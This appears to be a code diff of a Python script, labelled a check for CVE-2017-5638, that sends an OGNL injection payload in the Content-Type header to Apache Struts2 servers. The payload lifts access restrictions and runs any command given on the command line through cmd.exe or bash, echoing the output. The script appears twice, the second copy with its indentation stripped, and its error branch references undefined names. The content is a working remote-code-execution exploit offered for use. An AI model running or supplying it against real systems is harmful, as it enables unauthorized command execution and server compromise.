xsscx · March 10, 2017 16:51
diff --git a/CVE-2017-5638.py b/CVE-2017-5638.py
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 
 import urllib2
 import urllib3
 import requests
 import httplib
 import logging

 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

 def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(#cmd='%s')." % cmd
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
 
    try:

        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        #request = urllib2.Request(url, headers=headers)
        request = requests.get(url, headers=headers,verify=False)
        #page = urllib2.urlopen(request).read()

    except httplib.IncompleteRead, e:

        request = e.partial
        data = urllib.urlencode(values)
        req = urllib2.Request(url, data)
        response = urllib2.urlopen(req)
        the_page = response.read()

    print("\nObject get.request aka Response Code")
    print(requests.get(url, headers=headers,verify=False))
    print("\nPAYLOAD SENT")
    print(payload)
    print("\nObject request.URL")
    print(request.url)
    print("\nObject request.headers")
    print(request.headers)
    print("\nObject request.request")
    print(request.request)
    print("\nObject headers")
    print(headers)
    print("\nObject request.TEXT aka This is what you are looking for...")
    print(request.text)

 try:
    import http.client as http_client
 except ImportError:
    # Python 2
    import httplib as http_client
 http_client.HTTPConnection.debuglevel = 0
 print("Check for CVE-2017-5638 by XSS.Cx\n")
 logging.basicConfig()
 logging.getLogger().setLevel(logging.DEBUG)
 requests_log = logging.getLogger("requests.packages.urllib3")
 requests_log.setLevel(logging.DEBUG)
 requests_log.propagate = True

 if __name__ == '__main__':

    import sys
    if len(sys.argv) != 3:
        print("[*] struts.py <url> <cmd>")

    else:

        print('[*] Checking Site....')
        url = sys.argv[1]
        cmd = sys.argv[2]
        print("[*] cmd: %s\n" % cmd)
        print(url, cmd)
        exploit(url, cmd)
	#!/usr/bin/python
	# -- coding: utf-8 --

	import urllib2
	import urllib3
	import requests
	import httplib
	import logging

	from requests.packages.urllib3.exceptions import InsecureRequestWarning
	requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

	def exploit(url, cmd):
	payload = "%{(#_='multipart/form-data')."
	payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)."
	payload += "(#_memberAccess?"
	payload += "(#_memberAccess=#dm):"
	payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
	payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
	payload += "(#ognlUtil.getExcludedPackageNames().clear())."
	payload += "(#ognlUtil.getExcludedClasses().clear())."
	payload += "(#context.setMemberAccess(#dm))))."
	payload += "(#cmd='%s')." % cmd
	payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
	payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
	payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
	payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
	payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
	payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
	payload += "(#ros.flush())}"

	try:

	headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
	#request = urllib2.Request(url, headers=headers)
	request = requests.get(url, headers=headers,verify=False)
	#page = urllib2.urlopen(request).read()

	except httplib.IncompleteRead, e:

	request = e.partial
	data = urllib.urlencode(values)
	req = urllib2.Request(url, data)
	response = urllib2.urlopen(req)
	the_page = response.read()

	print("\nObject get.request aka Response Code")
	print(requests.get(url, headers=headers,verify=False))
	print("\nPAYLOAD SENT")
	print(payload)
	print("\nObject request.URL")
	print(request.url)
	print("\nObject request.headers")
	print(request.headers)
	print("\nObject request.request")
	print(request.request)
	print("\nObject headers")
	print(headers)
	print("\nObject request.TEXT aka This is what you are looking for...")
	print(request.text)

	try:
	import http.client as http_client
	except ImportError:
	# Python 2
	import httplib as http_client
	http_client.HTTPConnection.debuglevel = 0
	print("Check for CVE-2017-5638 by XSS.Cx\n")
	logging.basicConfig()
	logging.getLogger().setLevel(logging.DEBUG)
	requests_log = logging.getLogger("requests.packages.urllib3")
	requests_log.setLevel(logging.DEBUG)
	requests_log.propagate = True

	if __name__ == '__main__':

	import sys
	if len(sys.argv) != 3:
	print("[*] struts.py <url> <cmd>")

	else:

	print('[*] Checking Site....')
	url = sys.argv[1]
	cmd = sys.argv[2]
	print("[*] cmd: %s\n" % cmd)
	print(url, cmd)
	exploit(url, cmd)